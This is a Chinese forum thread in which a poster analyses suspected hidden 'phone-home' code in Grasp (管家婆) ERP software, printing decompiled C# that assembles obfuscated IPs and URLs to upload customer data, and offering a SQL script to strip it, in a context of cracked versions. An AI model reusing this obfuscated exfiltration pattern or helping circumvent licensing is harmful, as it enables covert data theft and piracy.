阳光网驿-企业信息化交流平台【DTC零售连锁全渠道解决方案】

 找回密码
 注册

QQ登录

只需一步,快速开始

扫描二维码登录本站

手机号码,快捷登录

老司机
查看: 40880|回复: 167

[讨论] 管家婆net全系列回传汇总与讨论

  [复制链接]
  • TA的每日心情
    无聊
    2016-5-29 23:31
  • 签到天数: 577 天

    [LV.9]以坛为家II

    发表于 2014-12-21 12:08:15 | 显示全部楼层 |阅读模式
    本帖最后由 ajm 于 2015-1-17 09:32 编辑

    近期管家婆回传门爆发,受害群体猛增。还记着使用v3和a8过账时候的锁数据提示吧
    新版本回传提示。
    回传报错.jpg
    明显的回传,有留意的朋友会发现安装iis的主机会有ip连接到上海、成都等地【下面会列出已知的所有回传ip】
    旧版本回传提示
    回传报错2.jpg
    恢复前面的账套就又可以了,但是用一段时间又不行了,因为你联网了,回传都有个共同特点。厂家后台不会全部锁数据,他会抽取单据量大的客户来锁,意思是你单据量达到了多少 厂家就开始注意了。

    下面列出所有回传ip


    1. 回传1
    2. 【upCustomerData2,上传客户的数据】
    3. namespace CarpaServer.AC
    4. {
    5.     using System;

    6.     public sealed class Ac_Define
    7.     {
    8.         public const string graspUrl = "www.grasp.com.cn";
    9.         public const string uf = "upCustomerData2";
    10.         public const string vs = "sbrsBPRj4OPwTQk2jKn2gw==";
    11.         public const string wsh = "115.239.210.27";
    12.     }
    13. }


    14. 回传2
    15. 111.111.111.1 w3wp.exe 在每天第一次打开经营历程的时候会出现回滚条迟钝几秒,次ip正在这时同步发送。

    16. 回传3
    17. 【upCustomerInfo上传客户信息到最下面的ip】
    18. 在CarpaServer.Common,systemdefine
    19. namespace CarpaServer.Common
    20. {
    21.     using System;

    22.     public sealed class SystemDefine
    23.     {
    24.         public const string baiduUrl = "www.baidu.com";
    25.         public const int BBS_ADD_EXP = 3;
    26.         public const string BBS_DIFF_TAG = "------------------!";
    27.         public const int BBS_REPLY_EXP = 1;
    28.         public const string cstWidth = "1000";
    29.         public const int dbHelperCommandTimeOut = 0x7d0;
    30.         public const int DESKTOP_LIST_COUNT = 6;
    31.         public const string graspNxUrl = "www.grasp.com.cn";
    32.         public const int gridHeigh = 0x300;
    33.         public const int gridWidth = 0x3f2;
    34.         public const int MaxDetailCount = 500;
    35.         public const int MAXIDLESECOND = 180;
    36.         public const int pagerNumericCount = 5;
    37.         public const string PosGuid = "e1899e3e-5cb3-4001-9478-84282a812d0b";
    38.         public const int reportGridHeight = 460;
    39.         public const int sysInputCount = 30;
    40.         public const string SYSTEM_EDITION = "9.4";
    41.         public const string SYSTEM_MEDITION = "";
    42.         public const string SYSTEM_PUBDATE = "2014-09-25";
    43.         public const string SYSTEM_VALIDNUMBER = "910";
    44.         public const string ufNx = "upCustomerInfo";
    45.         public const string vsNx = "NxsBrsBPRj4OPwTQk2jKn2gwbwexeTxneu";
    46.         public const string wshNx = "115.239.210.27";

    47.         public static string FULL_VERSION
    48.         {
    49.             get
    50.             {
    51.                 return string.Format(string.Format("{0}-{1}", "9.4", "2014-09-25".Replace('-', '.')), new object[0]);
    52.             }
    53.         }
    54.     }
    55. }


    56. 回传4
    57. 【间接调用数据库SysData.wsd,里面的ip进行触发回传】

    58. namespace CarpaServer.Commission
    59. {
    60.     using CarpaServer;
    61.     using System;

    62.     public class Commission_AtpGsx
    63.     {
    64.         public static string dtype = string.Format("{0}{1} {2}", AppUtils.productName, "9.4", string.IsNullOrEmpty("910") ? "" : "TOP");
    65.         public static string gwsip = string.Format("{0}{1}{2}{3}{4}{5}{6}", new object[] { Convert.ToString(0xdf), ".", Convert.ToString(4), ".", Convert.ToString(0x74), ".", Convert.ToString(0x16) });
    66.         public static string mstr = string.Format("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}", new object[] { "s", "br", "s", "BP", "Rj", "4", "OP", "wT", "Qk", "2j", "Kn2", "gw", "=", "=" });
    67.         public static string uf = string.Format("{0}{1}{2}{3}{4}{5}{6}{7}", new object[] { "u", "p", "C", "ust", "ome", "rD", "ata", "2" });

    68.         public static bool isCompared()
    69.         {
    70.             return (("115.1.210.17" != SysData.wsd) || ("2.239.210.27" == gwsip));
    71.         }

    72.         public static string rUrl()
    73.         {
    74.             return string.Format("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}", new object[] { "ht", "1p", ":", "/", "/", SysData.wsd, "/1", "rasp", "W", "ebSer", "ver/G", "W", "S", ".", "as", "mx" });
    75.         }

    76.         public static string[] userData()
    77.         {
    78.             return AppUtils.uData();
    79.         }
    80.     }
    81. }

    复制代码
    其他回传:
    这些都是总所周知的
    游客,如果您要查看本帖隐藏内容请回复

    管家婆所有分销B、S系列数据库去回传sql语句.rar (490 Bytes, 下载次数: 198) 送一个去数据库回传的执行语句。
    回传实在可恶,看了这些,知道用分销的风险了吧,我观察 目前网上发布的补丁,99%都只去掉了表面上的125.69.76.115和www.grasp.com.cn 这2个地址【我的除外】,所以大家要小心选择补丁提供方。

    然后大家觉得厂家是否该留后门,做一个讨论吧。


    单选投票, 共有 70 人参与投票
    您所在的用户组没有投票权限
    楼主热帖
    启用邀请码注册,提高发帖质量,建设交流社区
  • TA的每日心情
    开心
    昨天 09:00
  • 签到天数: 3857 天

    [LV.Master]伴坛终老

    发表于 2014-12-21 12:21:45 | 显示全部楼层
    自己使用时多加提防,每天备份。。。。。。。
    启用邀请码注册,提高发帖质量,建设交流社区
  • TA的每日心情
    开心
    昨天 11:39
  • 签到天数: 2654 天

    [LV.Master]伴坛终老

    发表于 2014-12-21 12:30:18 | 显示全部楼层
    xiexie 谢谢,分享。。。。。。。。。。。。。。。。。。
    启用邀请码注册,提高发帖质量,建设交流社区
  • TA的每日心情
    奋斗
    昨天 19:24
  • 签到天数: 4853 天

    [LV.Master]伴坛终老

    发表于 2014-12-21 12:33:25 | 显示全部楼层
    回复看看,看下楼主的去回传的补丁
    启用邀请码注册,提高发帖质量,建设交流社区
  • TA的每日心情
    难过
    2014-12-21 12:28
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2014-12-21 12:40:00 | 显示全部楼层
    明白真相所在,正版要支持,价格是问题
    启用邀请码注册,提高发帖质量,建设交流社区
  • TA的每日心情
    开心
    昨天 08:19
  • 签到天数: 1522 天

    [LV.Master]伴坛终老

    发表于 2014-12-21 13:23:52 | 显示全部楼层
    学习一下,发现这些应该费了不少耐心。。感谢分享出来。。。
    启用邀请码注册,提高发帖质量,建设交流社区
  • TA的每日心情
    难过
    2018-9-9 08:00
  • 签到天数: 1410 天

    [LV.10]以坛为家III

    发表于 2014-12-21 13:40:36 | 显示全部楼层
    回传无所谓  只要能给我们教破解学习了解他们的产品就行了..学习够了  不商用
    启用邀请码注册,提高发帖质量,建设交流社区
  • TA的每日心情
    奋斗
    前天 12:03
  • 签到天数: 4363 天

    [LV.Master]伴坛终老

    发表于 2014-12-21 13:54:27 | 显示全部楼层
    我用的9.4自己有的。也有这样的情况。一直解决不了。回复看看。。……。……。……。…………
    启用邀请码注册,提高发帖质量,建设交流社区
  • TA的每日心情
    慵懒
    2024-4-4 13:54
  • 签到天数: 3067 天

    [LV.Master]伴坛终老

    发表于 2014-12-21 14:10:19 | 显示全部楼层
    这个问题最近是比较多。。。。。。。。
    启用邀请码注册,提高发帖质量,建设交流社区
  • TA的每日心情
    郁闷
    2023-10-17 22:34
  • 签到天数: 557 天

    [LV.9]以坛为家II

    发表于 2014-12-21 14:38:55 | 显示全部楼层
    3eytreyryreyrytryrtyrtyryrtyry
    启用邀请码注册,提高发帖质量,建设交流社区
    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表